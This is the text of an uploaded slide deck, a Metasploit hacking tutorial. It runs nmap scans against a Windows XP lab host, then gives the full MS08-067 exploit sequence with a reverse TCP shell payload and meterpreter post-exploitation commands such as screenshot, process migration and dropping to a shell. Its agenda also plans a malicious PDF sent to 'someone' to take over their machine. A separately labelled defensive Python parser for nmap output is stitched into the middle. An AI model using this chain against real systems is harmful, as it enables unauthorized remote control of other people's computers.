Metasploit2

Date post: 02-Dec-2015
Upload: kwabenasapong8671
• PERFORM A PORT SCAN

• EXPLOIT AN APACHE SERVER AND TAKE CONTROL OF THE MACHINE RUNNING IT

• GENERATE A MALICIOUS PDF (VIRUS), SEND IT TO SOMEONE AND TAKE CONTROL OF THAT PERSON'S MACHINE =P

• ONE MORE HACK IF THERE IS TIME

root@bt:~# nmap -sS -Pn ip

• -sS <= Determines whether a port is open (TCP)

• -Pn <= Tells nmap not to use ping to determine whether a system is up (useful when ICMP packets are not allowed on the network)

root@bt:~# nmap -sS -Pn 172.16.32.131
Nmap scan report for 172.16.32.131
Host is up (0.00057s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1433/tcp open  ms-sql-s
3389/tcp open  ms-term-serv
Nmap done: 1 IP address (1 host up) scanned in 14.34 seconds

root@bt:~# nmap -sS -Pn -A ip

• -A <= nmap will attempt service enumeration

root@bt:~# nmap -Pn -sS -A 172.16.32.131
Nmap scan report for 172.16.32.131
Host is up (0.0035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
777/tcp  open  unknown
1138/tcp open  msrpc        Microsoft Windows RPC
1433/tcp open  ms-sql-s     Microsoft SQL Server 2005 9.00.1399; RTM
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows
Host script results:
|_nbstat: NetBIOS name: V-MAC-XP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c9:38:4c (VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Name: WORKGROUP\V-MAC-XP
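
Seen from the defender's side, the same scan report can be compared with an approved-ports baseline to list services the host should not be exposing. This is an added example, not part of the original slides; the function names and the `ALLOWED` baseline are assumptions, and the sample is the port table from the first scan above.

```python
import re

# Row of nmap's normal-output port table: PORT STATE SERVICE [VERSION]
PORT_ROW = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)"
    r"\s+(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)

def parse_ports(report):
    """Return one dict per port row; banner, OS and script lines are skipped."""
    rows = []
    for line in report.splitlines():
        m = PORT_ROW.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            rows.append(row)
    return rows

def unexpected_open(report, allowed):
    """Open ports missing from the approved {(port, proto)} baseline."""
    return [r for r in parse_ports(report)
            if r["state"] == "open" and (r["port"], r["proto"]) not in allowed]

# Port table copied from the first scan report on this page.
SAMPLE = """\
Nmap scan report for 172.16.32.131
Host is up (0.00057s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1433/tcp open  ms-sql-s
3389/tcp open  ms-term-serv
"""

# Assumed baseline (illustrative): the host should only serve HTTP/HTTPS.
ALLOWED = {(80, "tcp"), (443, "tcp")}

if __name__ == "__main__":
    for r in unexpected_open(SAMPLE, ALLOWED):
        print(f"{r['port']}/{r['proto']}", r["service"], r["version"] or "")
```
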

root@bt:~# nc ip port

• GET / HTTP/1.0

• HEAD / HTTP/1.0

• POST / HTTP/1.0

• msf> show exploits | grep exploit

• msf> show auxiliary

• msf> search mysql

• msf exploit(ms08_067_netapi) > show targets

• msf exploit(ms08_067_netapi) > info

• msf> use windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > back

• msf> show options

• msf > show payloads

• msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp

• msf exploit(ms08_067_netapi) > set RHOST ip

• msf exploit(ms08_067_netapi) > set LHOST ip

• msf exploit(ms08_067_netapi) > set LPORT port

• msf exploit(ms08_067_netapi) > exploit

• msf exploit(ms08_067_netapi) > sessions

• msf exploit(ms08_067_netapi) > sessions -i 1

• meterpreter > screenshot

• meterpreter > sysinfo

• meterpreter > ps

• meterpreter > migrate 1668

• meterpreter > getuid

• meterpreter > shell